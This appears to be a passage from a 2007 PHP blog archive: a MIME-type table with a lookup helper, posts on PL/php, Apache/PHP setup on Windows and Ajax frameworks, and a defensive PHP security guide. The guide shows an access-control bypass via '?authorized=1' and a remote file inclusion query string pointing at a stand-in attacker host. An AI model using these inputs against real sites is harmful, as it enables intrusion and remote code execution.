application/x-perfmon pma
application/x-perfmon pmc
application/x-perfmon pml
application/x-perfmon pmr
application/x-perfmon pmw
application/x-pkcs12 p12
application/x-pkcs12 pfx
application/x-pkcs7-certificates p7b
application/x-pkcs7-certificates spc
application/x-pkcs7-certreqresp p7r
application/x-pkcs7-mime p7c
application/x-pkcs7-mime p7m
application/x-pkcs7-signature p7s
application/x-sh sh
application/x-shar shar
application/x-shockwave-flash swf
application/x-stuffit sit
application/x-sv4cpio sv4cpio
application/x-sv4crc sv4crc
application/x-tar tar
application/x-tcl tcl
application/x-tex tex
application/x-texinfo texi
application/x-texinfo texinfo
application/x-troff roff
application/x-troff t
application/x-troff tr
application/x-troff-man man
application/x-troff-me me
application/x-troff-ms ms
application/x-ustar ustar
application/x-wais-source src
application/x-x509-ca-cert cer
application/x-x509-ca-cert crt
application/x-x509-ca-cert der
application/vnd.ms-pkipko pko
application/zip zip
audio/basic au
audio/basic snd
audio/mid mid
audio/mid rmi
audio/mpeg mp3
audio/x-aiff aif
audio/x-aiff aifc
audio/x-aiff aiff
audio/x-mpegurl m3u
audio/x-pn-realaudio ra
audio/x-pn-realaudio ram
audio/x-wav wav
image/bmp bmp
image/cis-cod cod
image/gif gif
image/ief ief
image/jpeg jpe
image/jpeg jpeg
image/jpeg jpg
image/pipeg jfif
image/svg+xml svg
image/tiff tif
image/tiff tiff
image/x-cmu-raster ras
image/x-cmx cmx
image/x-icon ico
image/x-portable-anymap pnm
image/x-portable-bitmap pbm
image/x-portable-graymap pgm
image/x-portable-pixmap ppm
image/x-rgb rgb
image/x-xbitmap xbm
image/x-xpixmap xpm
image/x-xwindowdump xwd
message/rfc822 mht
message/rfc822 mhtml
message/rfc822 nws
text/css css
text/h323 323
text/html htm
text/html html
text/html stm
text/iuls uls
text/plain bas
text/plain c
text/plain h
text/plain txt
text/richtext rtx
text/scriptlet sct
text/tab-separated-values tsv
text/webviewhtml htt
text/x-component htc
text/x-setext etx
text/x-vcard vcf
video/mpeg mp2
video/mpeg mpa
video/mpeg mpe
video/mpeg mpeg
video/mpeg mpg
video/mpeg mpv2
video/quicktime mov
video/quicktime qt
video/x-la-asf lsf
video/x-la-asf lsx
video/x-ms-asf asf
video/x-ms-asf asr
video/x-ms-asf asx
video/x-msvideo avi
video/x-sgi-movie movie
x-world/x-vrml flr
x-world/x-vrml vrml
x-world/x-vrml wrl
x-world/x-vrml wrz
x-world/x-vrml xaf
x-world/x-vrml xof


Mime Types By File Extension

Extension Type/sub-type
* application/octet-stream
323 text/h323
acx application/internet-property-stream
ai application/postscript
aif audio/x-aiff
aifc audio/x-aiff
aiff audio/x-aiff
asf video/x-ms-asf
asr video/x-ms-asf
asx video/x-ms-asf
au audio/basic
avi video/x-msvideo
axs application/olescript
bas text/plain
bcpio application/x-bcpio
bin application/octet-stream
bmp image/bmp
c text/plain
cat application/vnd.ms-pkiseccat
cdf application/x-cdf
cer application/x-x509-ca-cert
class application/octet-stream
clp application/x-msclip
cmx image/x-cmx
cod image/cis-cod
cpio application/x-cpio
crd application/x-mscardfile
crl application/pkix-crl
crt application/x-x509-ca-cert
csh application/x-csh
css text/css
dcr application/x-director
der application/x-x509-ca-cert
dir application/x-director
dll application/x-msdownload
dms application/octet-stream
doc application/msword
dot application/msword
dvi application/x-dvi
dxr application/x-director
eps application/postscript
etx text/x-setext
evy application/envoy
exe application/octet-stream
fif application/fractals
flr x-world/x-vrml
gif image/gif
gtar application/x-gtar
gz application/x-gzip
h text/plain
hdf application/x-hdf
hlp application/winhlp
hqx application/mac-binhex40
hta application/hta
htc text/x-component
htm text/html
html text/html
htt text/webviewhtml
ico image/x-icon
ief image/ief
iii application/x-iphone
ins application/x-internet-signup
isp application/x-internet-signup
jfif image/pipeg
jpe image/jpeg
jpeg image/jpeg
jpg image/jpeg
js application/x-javascript
latex application/x-latex
lha application/octet-stream
lsf video/x-la-asf
lsx video/x-la-asf
lzh application/octet-stream
m13 application/x-msmediaview
m14 application/x-msmediaview
m3u audio/x-mpegurl
man application/x-troff-man
mdb application/x-msaccess
me application/x-troff-me
mht message/rfc822
mhtml message/rfc822
mid audio/mid
mny application/x-msmoney
mov video/quicktime
movie video/x-sgi-movie
mp2 video/mpeg
mp3 audio/mpeg
mpa video/mpeg
mpe video/mpeg
mpeg video/mpeg
mpg video/mpeg
mpp application/vnd.ms-project
mpv2 video/mpeg
ms application/x-troff-ms
mvb application/x-msmediaview
nws message/rfc822
oda application/oda
p10 application/pkcs10
p12 application/x-pkcs12
p7b application/x-pkcs7-certificates
p7c application/x-pkcs7-mime
p7m application/x-pkcs7-mime
p7r application/x-pkcs7-certreqresp
p7s application/x-pkcs7-signature
pbm image/x-portable-bitmap
pdf application/pdf
pfx application/x-pkcs12
pgm image/x-portable-graymap
pko application/vnd.ms-pkipko
pma application/x-perfmon
pmc application/x-perfmon
pml application/x-perfmon
pmr application/x-perfmon
pmw application/x-perfmon
pnm image/x-portable-anymap
pot application/vnd.ms-powerpoint
ppm image/x-portable-pixmap
pps application/vnd.ms-powerpoint
ppt application/vnd.ms-powerpoint
prf application/pics-rules
ps application/postscript
pub application/x-mspublisher
qt video/quicktime
ra audio/x-pn-realaudio
ram audio/x-pn-realaudio
ras image/x-cmu-raster
rgb image/x-rgb
rmi audio/mid
roff application/x-troff
rtf application/rtf
rtx text/richtext
scd application/x-msschedule
sct text/scriptlet
setpay application/set-payment-initiation
setreg application/set-registration-initiation
sh application/x-sh
shar application/x-shar
sit application/x-stuffit
snd audio/basic
spc application/x-pkcs7-certificates
spl application/futuresplash
src application/x-wais-source
sst application/vnd.ms-pkicertstore
stl application/vnd.ms-pkistl
stm text/html
svg image/svg+xml
sv4cpio application/x-sv4cpio
sv4crc application/x-sv4crc
swf application/x-shockwave-flash
t application/x-troff
tar application/x-tar
tcl application/x-tcl
tex application/x-tex
texi application/x-texinfo
texinfo application/x-texinfo
tgz application/x-compressed
tif image/tiff
tiff image/tiff
tr application/x-troff
trm application/x-msterminal
tsv text/tab-separated-values
txt text/plain
uls text/iuls
ustar application/x-ustar
vcf text/x-vcard
vrml x-world/x-vrml
wav audio/x-wav
wcm application/vnd.ms-works
wdb application/vnd.ms-works
wks application/vnd.ms-works
wmf application/x-msmetafile
wps application/vnd.ms-works
wri application/x-mswrite
wrl x-world/x-vrml
wrz x-world/x-vrml
xaf x-world/x-vrml
xbm image/x-xbitmap
xla application/vnd.ms-excel
xlc application/vnd.ms-excel
xlm application/vnd.ms-excel
xls application/vnd.ms-excel
xlt application/vnd.ms-excel
xlw application/vnd.ms-excel
xof x-world/x-vrml
xpm image/x-xpixmap
xwd image/x-xwindowdump
z application/x-compress
zip application/zip
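A table like this is usually used for lookups by extension, for example to choose a Content-Type header when serving files. The sketch below copies a handful of rows from the table into a PHP array. mime_type_for() is a hypothetical helper. The fallback to application/octet-stream mirrors the * row above:

```php
<?php
// A small subset of the extension table above; extend as needed.
$mime_types = array(
    'css'  => 'text/css',
    'gif'  => 'image/gif',
    'htm'  => 'text/html',
    'html' => 'text/html',
    'jpeg' => 'image/jpeg',
    'jpg'  => 'image/jpeg',
    'pdf'  => 'application/pdf',
    'txt'  => 'text/plain',
    'zip'  => 'application/zip',
);

// Hypothetical helper: look up a file's MIME type by its (case-insensitive)
// extension, falling back to the "*" entry for unknown or missing extensions.
function mime_type_for($filename, array $mime_types)
{
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return isset($mime_types[$ext]) ? $mime_types[$ext] : 'application/octet-stream';
}
```

In a script that sends a file, you might then call header('Content-Type: ' . mime_type_for($file, $mime_types)); before any output, where $file is the hypothetical path being served.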

Sunday, August 12, 2007

PHP Procedural Language for PostgreSQL

What is PL/php?

PL/php is a procedural language with hooks into the PostgreSQL database system, intended to allow PHP functions to be written and used as functions inside the PostgreSQL database. It was written by Command Prompt, Inc. and has since been open sourced and licensed under the PHP and PostgreSQL (BSD) licenses.

Download and Installation

Please see the installation documentation for instructions on how to install PL/php 1.0. To install the new code, which only works with PostgreSQL 8.0 and 8.1 and is currently in development, see this page instead.

Creating the PL/php language

Please see the documentation on how to create the language in a database once the library is installed. If you are using PostgreSQL 8.1 you must follow these other instructions instead.

Apache 2, PHP 4 & PHP 5 on Windows XP


This is a comprehensive guide to installing and running Apache 2.2.4 with PHP 4.4.7 and PHP 5.2.3 on Windows XP. It covers all of the steps in detail with lots of screen grabs so you can follow the process visually.


Update: The guide has been updated for PHP 5.2.3. I have also created a new forum here. Please use it if you run into trouble following this guide, I'll be only too happy to help. You don't even need to register to post.


The Guide


I know that the number of sections looks daunting, but that is because I have split the guide up into small manageable chunks. It shouldn't take you longer than a couple of minutes to complete each section.



  1. Downloads

  2. Configure Windows XP for PHP

  3. PHP 4 Settings

  4. PHP 5 Settings

  5. Create a local web site

  6. Setting the Environment Variable

  7. Install Apache

  8. Install the Apache2 Handler

  9. httpd.conf

  10. Creating a Virtual Host

  11. system32/drivers/etc/hosts

  12. Bring Apache to life

  13. Switching to PHP 5


Useful Extras



  1. Adding another web site (detailed version)

  2. Adding another web site (short version)

  3. Build a PHP 4/5 switcher

  4. Run PHP 5 as a module and PHP 4 as CGI together


Troubleshooting



  1. Apache won't start

  2. Your guide doesn't work

  3. They've just released a new version of PHP! Now what?

  4. Can't you just do it for me?


Don't be disheartened by the length of the guide! There is no reason why you can't complete the entire process in under 30 minutes, and you'll be rewarded with a versatile and feature-packed local development environment.


Who is this guide aimed at?


It's aimed at everyone who posts on php-general or in forums asking how to get PHP and Apache running on Windows so they can develop and test locally. Often they'll hit simple but annoying problems that can be easily fixed. I also wrote this as an alternative to using a 'WAMP' installer. Teaching yourself how to install and configure PHP/Apache is a very useful set of skills to have, and well worth adding to your knowledge set.


User Feedback


Since releasing this guide I've received some great emails from people who've had success with it. Here are some of my favourite quotes: "Thank you for your VERY helpful instructions! This point on I can now learn PHP a lot better on my own computer. Cheers!" (Patrick) - "I very much appreciate your guide - you made it really easy" (Terry) - "Richard, this is truly the best guide to setting up php and apache i've seen online. Thank you so much." (Edward) - "Thanks for the great and detailed guide" (Thijs). "Thank you very much for the php guide you spent a lot of hard work to make, the guide covered everything, screenshots, alternatives as well as any possible errors and was precise and right to the point, and because of it i finally have php installed on my computer and i can learn it more conviniently." (Gaurav)


Thanks guys :) BTW all the feedback I have received so far has been incorporated into the guide. Feel free to use the new forum (see below) to send your comments / suggestions.


WAMP Guide Forum


Need help on a more 'interactive' level? Then why not use the WAMP Guide Forum. Post any questions or problems you may have. You don't even need to register to join. We'll help you as much as we can.

Wednesday, August 8, 2007

PHP Ajax Frameworks

  1. AJASON : AJASON is a PHP 5 library and JavaScript client
  2. AjaxAC : AjaxAC is an open-source framework written in PHP
  3. Ajax Agent : powerful open source framework for rapidly building Ajax or Rich Internet Applications (RIA)
  4. Cajax : A PHP class library for writing powerful reloadless web user interfaces using Ajax (DHTML+server-side) style
  5. CakePHP : Cake is a rapid development framework for PHP which uses commonly known design patterns like ActiveRecord, Association Data Mapping, Front Controller and MVC.
  6. Claw : a convenient and intuitive way of development of PHP5 driven object oriented applications.
  7. DutchPIPE : PHP object-oriented framework to turn sites into real-time, multi-user virtual environments.
  8. Flexible Ajax : Flexible Ajax is a handler to combine the remote scripting technology, also known as AJAX (Asynchronous Javascript and XML), with a php-based backend.
  9. Guava : Groundwork Guava is a PHP-based application framework and environment.
  10. HTML_AJAX : HTML_AJAX is a PEAR package for performing AJAX operations from PHP.
  11. HTSWaf : The HTS Web Application Framework is a PHP and Javascript based framework designed to make simple web applications easy to design and implement.
  12. My-BIC : My-BIC AJAX State of Mind for PHP harmony
  13. PAJAJ : PHP Asynchronous Javascript and JSON
  14. PAJAX : Remote (a)synchronous PHP objects in JavaScript
  15. phpAjaxTags : phpAjaxTags is a port to PHP from java tag library AjaxTags.
  16. PHPWebBuilder : PHPWebBuilder is a PHP framework designed following well-known object oriented designs and principles featuring a highly reusable components architecture, metadata based persistence and traditional GUI style programming support.
  17. Qcodo : open-source PHP 5 framework
  18. Simple AJAX : This tutorial demonstrates how to perform AJAX functionality simply and effectively, using the AJAX JSMX library, coupled with the JSON-PHP library.
  19. symfony : open-source PHP5 web framework
  20. TinyAjax : TinyAjax is a small php5 library that allows you to easily add AJAX-functionality to existing pages
  21. xajax : Ajax-enable your PHP application with a simple toolkit that gets the job done fast.
  22. XOAD : PHP based AJAX/XAP object oriented framework that allows you to create richer web applications
  23. Zoop : Zoop is an object-oriented framework for PHP based on a front controller. It is designed to be very fast and efficient and very nice for the programmer to work with.
  24. Zephyr : Zephyr is an Ajax-based framework for PHP 5 developers.

Tuesday, August 7, 2007

PHP Security Guide

What Is Security?

  • Security is a measurement, not a characteristic.

    It is unfortunate that many software projects list security as a simple requirement to be met. Is it secure? This question is as subjective as asking if something is hot.

  • Security must be balanced with expense.

    It is easy and relatively inexpensive to provide a sufficient level of security for most applications. However, if your security needs are very demanding, because you're protecting information that is very valuable, then you must achieve a higher level of security at an increased cost. This expense must be included in the budget of the project.

  • Security must be balanced with usability.

    It is not uncommon that steps taken to increase the security of a web application also decrease the usability. Passwords, session timeouts, and access control all create obstacles for a legitimate user. Sometimes these are necessary to provide adequate security, but there isn't one solution that is appropriate for every application. It is wise to be mindful of your legitimate users as you implement security measures.

  • Security must be part of the design.

    If you do not design your application with security in mind, you are doomed to be constantly addressing new security vulnerabilities. Careful programming cannot make up for a poor design.

Basic Steps

  • Consider illegitimate uses of your application.

    A secure design is only part of the solution. During development, when the code is being written, it is important to consider illegitimate uses of your application. Often, the focus is on making the application work as intended, and while this is necessary to deliver a properly functioning application, it does nothing to help make the application secure.

  • Educate yourself.

    The fact that you are here is evidence that you care about security, and as trite as it may sound, this is the most important step. There are numerous resources available on the web and in print, and several resources are listed in the PHP Security Consortium's
    Library at http://phpsec.org/library/.

  • If nothing else, FILTER ALL EXTERNAL DATA.

    Data filtering is the cornerstone of web application security in any language and on any platform. By initializing your variables and filtering all data that comes from an external source, you will address a majority of security vulnerabilities with very little effort. A whitelist approach is better than a blacklist approach. This means that you should consider all data invalid unless it can be proven valid (rather than considering all data valid unless it can be proven invalid).

Register Globals

The register_globals directive is disabled by default in PHP versions 4.2.0 and greater. While it does not represent a security vulnerability, it is a security risk. Therefore, you should always develop and deploy applications with register_globals disabled.

Why is it a security risk? Good general-purpose examples are difficult to produce, because it often takes a particular situation to make the risk clear. However, the most common example is the one found in the PHP manual:

<?php

if (authenticated_user())
{
    $authorized = true;
}

if ($authorized)
{
    include '/highly/sensitive/data.php';
}

?>

With register_globals enabled, this page can be requested with ?authorized=1 in the query string to bypass the intended access control. Of course, this particular vulnerability is the fault of the developer, not register_globals, but this indicates the increased risk posed by the directive. Without it, ordinary global variables (such as $authorized in the example) are not affected by data submitted by the client. A best practice is to initialize all variables and to develop with error_reporting set to E_ALL, so that the use of an uninitialized variable won't be overlooked during development.
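Applying that best practice to the manual's example takes one extra line. In this sketch, authenticated_user() is a hypothetical stub that always returns false, so the snippet runs on its own. A request with ?authorized=1 can no longer grant access, because the script sets $authorized itself before testing it:

```php
<?php
// Report everything, including uses of uninitialized variables.
error_reporting(E_ALL);

// Hypothetical stub standing in for a real authentication check.
function authenticated_user()
{
    return false;
}

// Initialize before use, so client data can never pre-set this flag.
$authorized = false;

if (authenticated_user())
{
    $authorized = true;
}

if ($authorized)
{
    include '/highly/sensitive/data.php';
}
```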

Another example that illustrates how register_globals can be problematic is the following use of include with a dynamic path:


<?php

include "$path/script.php";

?>
With register_globals enabled, this page can be requested with
?path=http%3A%2F%2Fevil.example.org%2F%3F in the query string in order to
equate this example to the following:


<?php

include 'http://evil.example.org/?/script.php';

?>

If allow_url_fopen is enabled (which it is by default, even in
php.ini-recommended), this will include the output of
http://evil.example.org/ just as if it were a local file. (As of PHP 5.2.0,
include also requires allow_url_include, which is disabled by default, before
it will fetch a remote URL.) This is a major security vulnerability, and it is
one that has been discovered in some popular open source applications.

Initializing $path can mitigate this particular risk, but so does disabling
register_globals. Whereas a developer's mistake can lead to an uninitialized
variable, disabling register_globals is a global configuration change that is
far less likely to be overlooked.


The convenience of register_globals is wonderful, and those of us who have had
to handle form data manually in the past appreciate it. However, using the
$_POST and $_GET superglobal arrays is still very convenient, and it's not
worth the added risk to enable register_globals. While I completely disagree
with arguments that equate register_globals to poor security, I do recommend
that it be disabled.



In addition to all of this, disabling
register_globals encourages developers to be mindful of the
origin of data, and this is an important characteristic of any
security-conscious developer.



Data Filtering

As stated previously, data filtering is the cornerstone of web
application security, and this is independent of programming language or
platform. It involves the mechanism by which you determine the validity of
data that is entering and exiting the application, and a good software design
can help developers to:

  • Ensure that data filtering cannot be bypassed,

  • Ensure that invalid data cannot be mistaken for valid data,
    and

  • Identify the origin of data.

Opinions about how to ensure that data filtering cannot be bypassed
vary, but there are two general approaches that seem to be the most common,
and both of these provide a sufficient level of assurance.


The Dispatch Method

One method is to have a single PHP script available directly from the
web (via URL). Everything else is a module included with
include or require as needed. This
method usually requires that a GET variable be passed along
with every URL, identifying the task. This GET variable can
be considered the replacement for the script name that would be used in a more
simplistic design. For example:



http://example.org/dispatch.php?task=print_form

The file dispatch.php is the only file within
document root. This allows a developer to do two important things:

  • Implement some global security measures at the top of
    dispatch.php and be assured that these measures
    cannot be bypassed.

  • Easily see that data filtering takes place when necessary, by
    focusing on the control flow of a specific task.

To further explain this, consider the following example
dispatch.php script:


<?php

/* Global security measures */

// Default to an empty task so a missing ?task= does not raise a notice;
// an empty task falls through to the default case.
$task = isset($_GET['task']) ? $_GET['task'] : '';

switch ($task)
{
    case 'print_form':
        include '/inc/presentation/form.inc';
        break;

    case 'process_form':
        $form_valid = false;
        include '/inc/logic/process.inc';
        if ($form_valid)
        {
            include '/inc/presentation/end.inc';
        }
        else
        {
            include '/inc/presentation/form.inc';
        }
        break;

    default:
        include '/inc/presentation/index.inc';
        break;
}

?>


If this is the only public PHP script, then it should be clear that the
design of this application ensures that any global security measures taken at
the top cannot be bypassed. It also lets a developer easily see the control
flow for a specific task. For example, instead of glancing through a lot of
code, it is easy to see that end.inc is only displayed to a
user when $form_valid is true, and
because it is initialized as false just before
process.inc is included, it is clear that the logic within
process.inc must set it to true,
otherwise the form is displayed again (presumably with appropriate error
messages).



Note
If you use a directory index file such as
index.php (instead of dispatch.php), you
can use URLs such as
http://example.org/?task=print_form.

You can also use the Apache ForceType directive or mod_rewrite to
accommodate URLs such as http://example.org/app/print-form.


The Include Method

Another approach is to have a single module that is responsible for all
security measures. This module is included at the top (or very near the top)
of all PHP scripts that are public (available via URL). Consider the following
security.inc script:




<?php

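// Default to an empty form name so a missing field does not raise a notice.
$form = isset($_POST['form']) ? $_POST['form'] : '';

switch ($form)
{
    case 'login':
        $allowed = array();
        $allowed[] = 'form';
        $allowed[] = 'username';
        $allowed[] = 'password';

        $sent = array_keys($_POST);

        if ($allowed == $sent)
        {
            include '/inc/logic/process.inc';
        }

        break;
}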

?>

In this example, each form that is submitted is expected to have a form
variable named form that uniquely identifies it, and security.inc has a
separate case to handle the data filtering for that particular form. An
example of an HTML form that fulfills this requirement is as follows:


<form action="/receive.php" method="POST">
<input type="hidden" name="form" value="login" />
<p>Username:
<input type="text" name="username" /></p>
<p>Password:
<input type="password" name="password" /></p>

<input type="submit" />
</form>

An array named $allowed is used to identify exactly which form variables are
allowed, and the list of submitted variable names must match it exactly (same
names, same order, nothing extra) for the form to be processed. Control flow
is determined elsewhere, and process.inc is where the actual data filtering
takes place.
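The original check uses == on two numerically indexed arrays, which compares values position by position. As a result, the fields must also arrive in the same order as $allowed. If you'd rather not depend on field order, you could use an order-insensitive variant. form_fields_allowed() is a hypothetical helper name, and sorting both lists before a strict === comparison is a swapped-in technique, not the original author's:

```php
<?php
// Hypothetical helper: true only when the submitted field names are exactly
// the allowed ones (nothing missing, nothing extra), in any order.
function form_fields_allowed(array $allowed, array $submitted)
{
    // Cast keys to strings: PHP turns numeric field names such as "0" into ints.
    $sent = array_map('strval', array_keys($submitted));

    sort($allowed, SORT_STRING);
    sort($sent, SORT_STRING);

    return $allowed === $sent;
}

$allowed = array('form', 'username', 'password');
```

Inside security.inc you would then test form_fields_allowed($allowed, $_POST) in place of the == comparison.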


Note
A good way to ensure that security.inc is always included at the top of
every PHP script is to use the auto_prepend_file directive.


Filtering Examples

It is important to take a whitelist approach to your data filtering, and
while it is impossible to give examples for every type of form data you may
encounter, a few examples can help to illustrate a sound approach.

The following validates an email address:


<?php

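$clean = array();

// The D modifier makes $ match only at the very end of the subject, so a
// trailing newline cannot slip through; is_string() rejects array input
// such as email[]=... before it reaches preg_match().
$email_pattern = '/^[^@\s<&>]+@([-a-z0-9]+\.)+[a-z]{2,}$/iD';

if (isset($_POST['email']) && is_string($_POST['email'])
    && preg_match($email_pattern, $_POST['email']))
{
    $clean['email'] = $_POST['email'];
}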

?>
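Since PHP 5.2.0, the filter extension also offers a built-in email check. The sketch below is an alternative to the hand-written pattern, not the author's method. The $input array is a hypothetical stand-in for $_POST, so the snippet runs on its own. The filter's rules differ from the regular expression above, so test it against the addresses you expect to accept:

```php
<?php
$clean = array();

// Hypothetical input; in a real script this would be $_POST.
$input = array('email' => 'user@example.org');

if (isset($input['email']) && is_string($input['email']))
{
    // filter_var() returns the validated string, or false on failure.
    $email = filter_var($input['email'], FILTER_VALIDATE_EMAIL);

    if ($email !== false)
    {
        $clean['email'] = $email;
    }
}
```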


The following ensures that $_POST['color'] is red, green, or blue:



<?php

$clean = array();

if (isset($_POST['color']))
{
    switch ($_POST['color'])
    {
        case 'red':
        case 'green':
        case 'blue':
            $clean['color'] = $_POST['color'];
            break;
    }
}

?>

The following example ensures that $_POST['num'] is
an integer:


<?php

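$clean = array();

// Strict comparison (===) rejects strings such as "5.0" or " 5", which a
// loose comparison (==) would treat as equal to their integer form.
if (isset($_POST['num']) && $_POST['num'] === strval(intval($_POST['num'])))
{
    $clean['num'] = $_POST['num'];
}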

?>


The following example ensures that $_POST['num'] is a
float:



<?php

$clean = array();

if (isset($_POST['num']) && $_POST['num'] == strval(floatval($_POST['num'])))
{
    $clean['num'] = $_POST['num'];
}

?>
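The filter extension (PHP 5.2.0 and later) can perform both of these checks too. The sketch below again uses a hypothetical $input array in place of $_POST, with a hypothetical price field for the float case. FILTER_VALIDATE_INT and FILTER_VALIDATE_FLOAT return the converted number on success and false on failure. Because a valid "0" comes back as the falsy int 0, compare against false with !==:

```php
<?php
$clean = array();

// Hypothetical input; in a real script this would be $_POST.
$input = array('num' => '42', 'price' => '19.95');

// Returns an int on success, false if the value is not an integer.
$num = isset($input['num']) ? filter_var($input['num'], FILTER_VALIDATE_INT) : false;
if ($num !== false)
{
    $clean['num'] = $num;
}

// Returns a float on success, false if the value is not a number.
$price = isset($input['price']) ? filter_var($input['price'], FILTER_VALIDATE_FLOAT) : false;
if ($price !== false)
{
    $clean['price'] = $price;
}
```

Unlike the string comparisons above, this approach stores a real int or float in $clean rather than the original string.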

Naming Conventions

Each of the previous examples makes use of an array named
$clean. This illustrates a good practice that can help
developers identify whether data is potentially tainted. You should never make
a practice of validating data and leaving it in $_POST or
$_GET, because it is important for developers to always be
suspicious of data within these superglobal arrays.

In addition, a more liberal use of $clean can allow
you to consider everything else to be tainted, and this more closely resembles
a whitelist approach and therefore offers an increased level of
security.

If you only store data in $clean after it has been
validated, the only risk in a failure to validate something is that you might
reference an array element that doesn't exist rather than potentially tainted
data.


Timing

Once a PHP script begins processing, the entire HTTP request has been
received. This means that the user does not have another opportunity to send
data, and therefore no data can be injected into your script (even if
register_globals is enabled). This is why initializing your
variables is such a good practice.



Error Reporting

In versions of PHP prior to PHP 5 (released 13 July 2004), error reporting
is fairly simplistic. Aside from careful programming, it relies mostly upon a
few specific PHP configuration directives:

  • error_reporting

    This directive sets the level of error reporting desired. It is
    strongly suggested that you set this to E_ALL for
    both development and production.

  • display_errors

    This directive determines whether errors should be displayed on
    the screen (included in the output). You should develop with this set
    to On, so that you can be alerted to errors during
    development, and you should set this to Off for
    production, so that errors are hidden from the users (and potential
    attackers).

  • log_errors

    This directive determines whether errors should be written to a
    log. While this may raise performance concerns, errors should be rare
    in the first place. If logging errors puts a strain on the disk due
    to heavy I/O, you probably have larger concerns than the
    performance of your application. You should set this directive to
    On in production.

  • error_log

    This directive indicates the location of the log file to which
    errors are written. Make sure that the web server has write privileges
    for the specified file.

Having error_reporting set to E_ALL will help to enforce the initialization
of variables, because a reference to an undefined variable generates a notice.


Note
Each of these directives can be set with
ini_set(), in case you do not have access to
php.ini or another method of setting these
directives.
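For example, the production settings recommended above could be applied at the top of a script as follows. This is a sketch. The log path is a hypothetical placeholder built with sys_get_temp_dir(). In practice you would point it at a file the web server can write to:

```php
<?php
// Report every error, in development and in production.
error_reporting(E_ALL);

// Production: hide errors from users (and potential attackers)...
ini_set('display_errors', '0');

// ...but still write them to a log.
ini_set('log_errors', '1');

// Hypothetical log location; the web server needs write access to it.
ini_set('error_log', sys_get_temp_dir() . '/php_errors.log');
```

During development you would set display_errors to '1' instead, so that errors appear on screen.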

A good reference on all error handling and reporting functions is in the
PHP manual:


http://www.php.net/manual/en/ref.errorfunc.php

PHP 5 includes exception handling. For more information, see:



http://www.php.net/manual/language.exceptions.php